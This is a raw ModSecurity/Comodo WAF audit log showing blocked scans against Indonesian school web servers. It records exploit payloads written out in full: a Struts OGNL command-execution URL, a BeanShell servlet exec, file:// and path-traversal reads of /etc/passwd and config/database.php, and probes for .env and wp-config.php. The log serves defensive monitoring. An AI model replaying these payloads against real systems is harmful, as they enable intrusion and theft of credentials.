combined=1840, p1=409, p2=1405, p3=0, p4=0, p5=26, sr=74, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ba75750d-Z-- --4e6a1c22-A-- [04/Jun/2025:02:11:30 +0700] aD9I4ghM7ynDNybXsoMjpQAAAFQ 103.236.140.4 36250 103.236.140.4 8181 --4e6a1c22-B-- POST /bsh.servlet.BshServlet HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 178.128.54.187 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 58 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:126.0) Gecko/20100101 Firefox/126.0 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 178.128.54.187 Cookie: X-Varnish: 173148147 --4e6a1c22-C-- bsh.script=exec("cat+/etc/passwd");&bsh.servlet.output=raw --4e6a1c22-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4e6a1c22-E-- --4e6a1c22-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /bsh.servlet.BshServlet"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748977890115367 26137 (- - -) Stopwatch2: 1748977890115367 26137; combined=49510, p1=295, p2=113, p3=0, p4=0, p5=24562, sr=53, sw=0, l=0, gc=24540 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4e6a1c22-Z-- --40846d05-A-- [04/Jun/2025:02:11:31 +0700] aD9I440G58RZMmoh8H1caQAAAIc 103.236.140.4 36300 103.236.140.4 8181 --40846d05-B-- POST /sys/ui/extend/varkind/custom.jsp HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 178.128.54.187 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 42 User-Agent: Mozilla/5.0 (ZZ; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0 Accept: */* Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 178.128.54.187 Cookie: X-Varnish: 172923262 --40846d05-C-- var={"body":{"file":"file:///etc/passwd"}} --40846d05-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --40846d05-E-- --40846d05-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /sys/ui/extend/varkind/custom.jsp"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748977891094319 1048 (- - -) Stopwatch2: 1748977891094319 1048; combined=287, p1=212, p2=55, p3=0, p4=0, p5=20, sr=40, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --40846d05-Z-- --5df25f63-A-- [04/Jun/2025:02:11:32 +0700] aD9I5ESujXvW2xVCZlU23QAAAAM 103.236.140.4 36308 103.236.140.4 8181 --5df25f63-B-- POST /public/index.php/material/Material/_download_imgage?media_id=1&picUrl=./../config/database.php HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 178.128.54.187 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 5 User-Agent: Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 178.128.54.187 Cookie: X-Varnish: 171315398 --5df25f63-C-- "1":1 --5df25f63-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5df25f63-E-- --5df25f63-H-- Message: Access denied with code 403 (phase 2). Matched phrase "config/database.php" at ARGS:picUrl. [file "/usr/local/apache/modsecurity-cwaf/rules/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: config/database.php found within ARGS:picUrl: ../config/database.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748977892078191 3486 (- - -) Stopwatch2: 1748977892078191 3486; combined=1730, p1=466, p2=1229, p3=0, p4=0, p5=35, sr=74, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5df25f63-Z-- --3d0bf67b-A-- [04/Jun/2025:02:24:47 +0700] aD9L_whM7ynDNybXsoMl2wAAAE8 103.236.140.4 41150 103.236.140.4 8181 --3d0bf67b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.115.46 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.115.46 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.5; en-US; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Accept-Charset: utf-8 --3d0bf67b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3d0bf67b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748978687642477 783 (- - -) Stopwatch2: 1748978687642477 783; combined=325, p1=280, p2=0, p3=0, p4=0, p5=44, sr=82, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3d0bf67b-Z-- --2dfd0732-A-- [04/Jun/2025:02:53:37 +0700] aD9SwQhM7ynDNybXsoMo4QAAAEo 103.236.140.4 51336 103.236.140.4 8181 --2dfd0732-B-- GET /index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat%20/etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 198.252.110.114 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Fedora; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0 --2dfd0732-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2dfd0732-E-- --2dfd0732-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str..."] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748980417814242 2632 (- - -) Stopwatch2: 1748980417814242 2632; combined=979, p1=441, p2=503, p3=0, p4=0, p5=35, sr=68, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2dfd0732-Z-- --ec7fe132-A-- [04/Jun/2025:03:08:31 +0700] aD9WPwhM7ynDNybXsoMqsQAAAEA 103.236.140.4 56586 103.236.140.4 8181 --ec7fe132-B-- GET /api/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 207.180.223.50 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 207.180.223.50 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 8.1.0; SM-G610M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --ec7fe132-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ec7fe132-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748981311364021 855 (- - -) Stopwatch2: 1748981311364021 855; combined=365, p1=330, p2=0, p3=0, p4=0, p5=34, sr=71, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ec7fe132-Z-- --1a4ddb7f-A-- [04/Jun/2025:04:15:42 +0700] aD9l_pLmnxTwEPX7IubNBAAAAJY 103.236.140.4 40874 103.236.140.4 8181 --1a4ddb7f-B-- GET /.docker/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.66 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.35 Safari/537.36 Accept-Charset: utf-8 --1a4ddb7f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1a4ddb7f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748985342990242 935 (- - -) Stopwatch2: 1748985342990242 935; combined=373, p1=333, p2=0, p3=0, p4=0, p5=40, sr=119, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1a4ddb7f-Z-- --ece84f1c-A-- [04/Jun/2025:04:22:39 +0700] aD9nnzNXNn6zAsHj7JAWPgAAAFc 103.236.140.4 40920 103.236.140.4 8181 --ece84f1c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.133.172.220 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.133.172.220 X-Forwarded-Proto: https Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) --ece84f1c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ece84f1c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748985759180660 2579 (- - -) Stopwatch2: 1748985759180660 2579; combined=1148, p1=381, p2=740, p3=0, p4=0, p5=27, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ece84f1c-Z-- --8c3af575-A-- [04/Jun/2025:04:30:04 +0700] aD9pXNhPZJx8OfNaLCovbwAAAMo 103.236.140.4 41022 103.236.140.4 8181 --8c3af575-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 64.225.123.97 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 64.225.123.97 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --8c3af575-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8c3af575-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748986204725296 1004 (- - -) Stopwatch2: 1748986204725296 1004; combined=362, p1=320, p2=0, p3=0, p4=0, p5=41, sr=92, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8c3af575-Z-- --ac703357-A-- [04/Jun/2025:04:33:14 +0700] aD9qGthPZJx8OfNaLCovcQAAAM0 103.236.140.4 41058 103.236.140.4 8181 --ac703357-B-- GET /.env.save HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.74 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.74 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) CriOS/30.0.1599.12 Mobile/11A465 Safari/8536.25 (3B92C18B-D9DE-4CB7-A02A-22FD2AF17C8F) Accept-Charset: utf-8 --ac703357-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ac703357-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748986394007945 992 (- - -) Stopwatch2: 1748986394007945 992; combined=376, p1=335, p2=0, p3=0, p4=0, p5=41, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ac703357-Z-- --bb558d69-A-- [04/Jun/2025:05:01:23 +0700] aD9ws5LmnxTwEPX7IubNPAAAAJc 103.236.140.4 41196 103.236.140.4 8181 --bb558d69-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.84.199 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.84.199 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36 Accept-Charset: utf-8 --bb558d69-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bb558d69-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748988083703995 877 (- - -) Stopwatch2: 1748988083703995 877; combined=357, p1=315, p2=0, p3=0, p4=0, p5=42, sr=99, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bb558d69-Z-- --3bf28776-A-- [04/Jun/2025:05:35:04 +0700] aD94mNhPZJx8OfNaLCovvwAAAMk 103.236.140.4 42162 103.236.140.4 8181 --3bf28776-B-- GET /wp-config.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 172602419 --3bf28776-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --3bf28776-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748990104622872 864 (- - -) Stopwatch2: 1748990104622872 864; combined=345, p1=302, p2=0, p3=0, p4=0, p5=42, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3bf28776-Z-- --18d98625-A-- [04/Jun/2025:06:12:04 +0700] aD-BRJLmnxTwEPX7IubOvAAAAJA 103.236.140.4 43852 103.236.140.4 8181 --18d98625-B-- GET /._wp-config.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 172603397 --18d98625-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --18d98625-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748992324769297 619 (- - -) Stopwatch2: 1748992324769297 619; combined=294, p1=261, p2=0, p3=0, p4=0, p5=32, sr=71, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --18d98625-Z-- --8f80562a-A-- [04/Jun/2025:06:13:25 +0700] aD-BlTNXNn6zAsHj7JAXJQAAAE4 103.236.140.4 43910 103.236.140.4 8181 --8f80562a-B-- GET /.env-dev.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 172603421 --8f80562a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --8f80562a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748992405016098 915 (- - -) Stopwatch2: 1748992405016098 915; combined=375, p1=336, p2=0, p3=0, p4=0, p5=39, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8f80562a-Z-- --a8f0dc53-A-- [04/Jun/2025:06:13:26 +0700] aD-BlthPZJx8OfNaLCowlAAAAMo 103.236.140.4 43914 103.236.140.4 8181 --a8f0dc53-B-- GET /.env-prod.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 162521298 --a8f0dc53-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --a8f0dc53-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748992406273653 831 (- - -) Stopwatch2: 1748992406273653 831; combined=322, p1=289, p2=0, p3=0, p4=0, p5=33, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a8f0dc53-Z-- --321d8e7b-A-- [04/Jun/2025:06:13:33 +0700] aD-BnV_DvM40jZomokt-FgAAAAs 103.236.140.4 43918 103.236.140.4 8181 --321d8e7b-B-- GET /.env.*.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 172603424 --321d8e7b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --321d8e7b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748992413379222 865 (- - -) Stopwatch2: 1748992413379222 865; combined=321, p1=279, p2=0, p3=0, p4=0, p5=42, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --321d8e7b-Z-- --be2e5b49-A-- [04/Jun/2025:06:13:37 +0700] aD-BoV_DvM40jZomokt-FwAAAAw 103.236.140.4 43922 103.236.140.4 8181 --be2e5b49-B-- GET /.env.back.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 172603427 --be2e5b49-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --be2e5b49-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748992417499099 688 (- - -) Stopwatch2: 1748992417499099 688; combined=292, p1=261, p2=0, p3=0, p4=0, p5=31, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) 